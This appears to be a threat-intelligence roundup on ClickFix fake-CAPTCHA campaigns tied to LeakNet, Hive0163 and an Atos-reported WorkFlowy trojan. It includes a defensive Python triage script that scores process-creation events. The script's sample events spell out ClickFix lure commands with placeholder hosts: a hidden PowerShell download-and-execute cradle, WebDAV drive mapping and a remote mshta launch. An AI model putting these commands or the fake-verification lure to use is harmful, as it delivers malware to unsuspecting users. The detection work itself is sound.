ClickFix Social Engineering Campaigns Expand Malware and Ransomware Delivery
Researchers reported continued expansion of ClickFix as an initial-access technique: attackers present a fake CAPTCHA or "verification" page that silently copies a command to the clipboard and instructs the user to paste it into a Windows launcher such as the Run dialog, so the victim executes the first stage by hand. In one campaign, LeakNet shifted away from relying on initial access brokers and instead used compromised legitimate websites hosting fake Cloudflare Turnstile checks, both to broaden victim acquisition and to reduce network-based detection. ReliaQuest linked the activity to LeakNet through overlapping infrastructure and consistent TTPs, and noted the group paired ClickFix with a stealthy, memory-resident loader built on the Deno JavaScript runtime to support ransomware operations.
A separate ClickFix campaign analyzed by Atos used the same user-executed command pattern to map attacker-controlled network drives with net use, then download a trojanized but legitimately signed WorkFlowy application whose modified asar archive executed malicious code in the Node.js main process with the logged-in user’s privileges. Other reporting on Hive0163 also identified ClickFix as one of several initial-access methods used in Interlock ransomware intrusions, although that article focused primarily on the group’s likely AI-generated Slopoly malware rather than a specific ClickFix incident. Reporting on Operation Covert Access in Argentina’s judicial sector was unrelated, describing spear-phishing with fake court documents to deliver COVERT RAT via a different intrusion chain.
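The summary above and the Atos and Hive0163 timeline entries below all describe the same user-executed pattern: a command pasted from a fake verification page into the Run dialog that maps a remote share with net use, runs a PowerShell download cradle, or launches mshta against a URL. The Python triage script below is an added example, not code from any of the cited reports; it scores process-creation events (simplified Sysmon Event ID 1 / Security 4688 fields) for that pattern, weighting an interpreter whose parent is explorer.exe most heavily because that is what "the user typed it into Run" looks like in telemetry. The sample events are constructed; the hosts, IP addresses, paths and verification IDs in them are made up, and the rule names, weights and threshold are assumptions to tune locally.

```python
"""Heuristic ClickFix triage over process-creation telemetry.

Added example, not from the cited reports. Events are constructed, simplified
Sysmon Event ID 1 / Security 4688 records; hosts, paths and IDs are made up.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str   # ParentImage / Creator Process Name
    image: str          # Image / New Process Name
    command_line: str   # CommandLine / Process Command Line


# The Run dialog (Win+R) and the Explorer address bar are hosted by explorer.exe,
# so an interpreter whose parent is explorer.exe was most likely typed or pasted by the user.
USER_LAUNCHERS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "net.exe", "net1.exe"}

# (rule name, regex over the command line). Names and weights are assumptions.
RULES = [
    # "net use X: \\host\share" against a remote share (WebDAV hosts look like host@SSL@443)
    ("net_use_remote_share", re.compile(r"\bnet1?(?:\.exe)?\s+use\b.*\\\\[\w.\-]+(?:@\w+)*\\", re.I)),
    ("unc_or_webdav_path", re.compile(r"\\\\[\w.\-]+(?:@\w+)*\\", re.I)),
    ("download_cradle", re.compile(r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|curl|wget|downloadstring|downloadfile)\b", re.I)),
    ("inline_exec", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("evasion_switches", re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b|-nop\b|-noni\b|-ep\s+bypass\b", re.I)),
    ("mshta_remote", re.compile(r"\bmshta(?:\.exe)?\s+\S*https?:", re.I)),
    ("encoded_command", re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{40,}", re.I)),
    # Lures append a comment so the Run dialog shows reassuring text instead of the payload
    ("verification_comment", re.compile(r"#.*(?:not a robot|captcha|verif|human)", re.I)),
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return (score, matched rule names) for one process-creation event."""
    hits = [name for name, rx in RULES if rx.search(ev.command_line)]
    score = len(hits)
    # Parent/child context outweighs any single command-line token.
    if _basename(ev.parent_image) in USER_LAUNCHERS and _basename(ev.image) in INTERPRETERS:
        hits.insert(0, "user_launched_interpreter")
        score += 2
    return score, hits


def triage(events: list[ProcEvent], threshold: int = 3) -> list[tuple[int, int, list[str]]]:
    """Return [(event index, score, hits)] for events at or above threshold."""
    out = []
    for i, ev in enumerate(events):
        score, hits = score_event(ev)
        if score >= threshold:
            out.append((i, score, hits))
    return out


# Constructed sample telemetry (made-up hosts, IPs, paths and IDs).
SAMPLE_EVENTS = [
    # ClickFix: drive mapping to a WebDAV share, then launching a trojanized app from it
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell -w hidden -c "net use Z: \\198.51.100.10@SSL@443\DavWWWRoot; '
              r'Start-Process Z:\WorkFlowy\WorkFlowy.exe" # "I am not a robot - Cloudflare Verification ID: 7331"'),
    # ClickFix: classic download-and-execute cradle with a fake reCAPTCHA comment
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell -NoP -NonI -W Hidden -c "iex (irm https://verify.example.invalid/run)" '
              r'# "I am not a robot - reCAPTCHA Verification ID: 9412"'),
    # Benign: an administrator mapping a home drive from an interactive console
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\net.exe",
              r"net use H: \\fileserver01\home /persistent:yes"),
    # Benign: service host
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
              r"svchost.exe -k netsvcs -p"),
    # ClickFix: mshta pulling a remote HTA from the Run dialog
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r"mshta https://verify.example.invalid/check.hta"),
]


if __name__ == "__main__":
    for idx, score, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: score={score} hits={hits}")
        print(f"  {SAMPLE_EVENTS[idx].command_line[:90]}")
```

Two of the five constructed events score 6 and the mshta one scores 3; the administrator's net use from cmd.exe scores 2 and stays below the threshold because the parent is not explorer.exe. A user who legitimately maps a drive from Win+R will trip the rule, so treat hits as triage leads rather than verdicts. For after-the-fact confirmation on an endpoint, the commands typed into the Run dialog are also recorded per user under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth collecting alongside the process-creation log.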

How this story unfolded
7 events from the most recent confirmed update back to the earliest known activity.
ReliaQuest attributes expanded ClickFix and Deno activity to LeakNet
ReliaQuest reported with high confidence that LeakNet was behind an expanded campaign using ClickFix lures and a stealthy Deno-based in-memory loader. The attribution was based on overlapping infrastructure and consistent tactics, techniques, and procedures observed across multiple incidents.
Atos identifies ClickFix campaign mapping attacker-controlled drives
Atos researchers identified a new ClickFix campaign that used fake CAPTCHA pages to trick Windows users into running hidden commands through the Run dialog. The attack mapped a remote drive with the native net use command and delivered a trojanized WorkFlowy application that communicated with the command-and-control domain cloudflare.report.
LeakNet shifts to self-delivered ClickFix and Teams phishing campaigns
By March 2026, LeakNet had expanded beyond relying mainly on initial access brokers and began using ClickFix lures on compromised websites, and in at least one case Microsoft Teams phishing, to gain access directly. The updated intrusion chain used a Deno-based in-memory loader and a consistent post-exploitation sequence including jli.dll sideloading, klist, PsExec, and exfiltration to cloud services.
IBM publicly reports Slopoly and links Hive0163 to Interlock activity
IBM X-Force disclosed its findings on Slopoly on March 16, 2026, describing it as likely AI-generated malware used by Hive0163 in a ransomware intrusion. The report also linked Hive0163 to Interlock ransomware operations, custom tooling, malvertising, and possible cooperation with initial access brokers, and published indicators including the domain plurfestivalgalaxy[.]com.
Hive0163 deploys likely AI-generated Slopoly malware
During the same early-2026 live incident, Hive0163 deployed Slopoly, a custom command-and-control client that IBM X-Force assessed as likely AI-generated. IBM cited traits such as extensive comments, consistent error handling, clearly named variables, and an unused jitter function in support of that assessment.
Hive0163 launches intrusion via ClickFix social engineering
In early 2026, a Hive0163 intrusion began with a ClickFix social engineering attack that tricked a user into running a malicious PowerShell command. The attackers then deployed NodeSnake, InterlockRAT, Slopoly, and post-exploitation tools including AzCopy and Advanced IP Scanner.
LeakNet ransomware first observed
LeakNet was first observed as an emerging ransomware operator in late 2024. Early reporting described it as a relatively low-volume operation before its later expansion in scale and tradecraft.
Sources
LeakNet Ransomware Dissection (TheCyberThrone, thecyberthrone.in)
LeakNet Scales Ransomware Operations With ClickFix Lures and Stealthy Deno Loader (cybersecuritynews.com)
New ClickFix Scam Tricks Users Into Mapping Hacker-Controlled Drives (hackread.com)
Casting a Wider Net: ClickFix, Deno, and LeakNet’s Scaling Threat (ReliaQuest, reliaquest.com)
IBM Uncovers ‘Slopoly,’ Likely AI-Generated Malware Used in Hive0163 Ransomware Attack (cybersecuritynews.com)


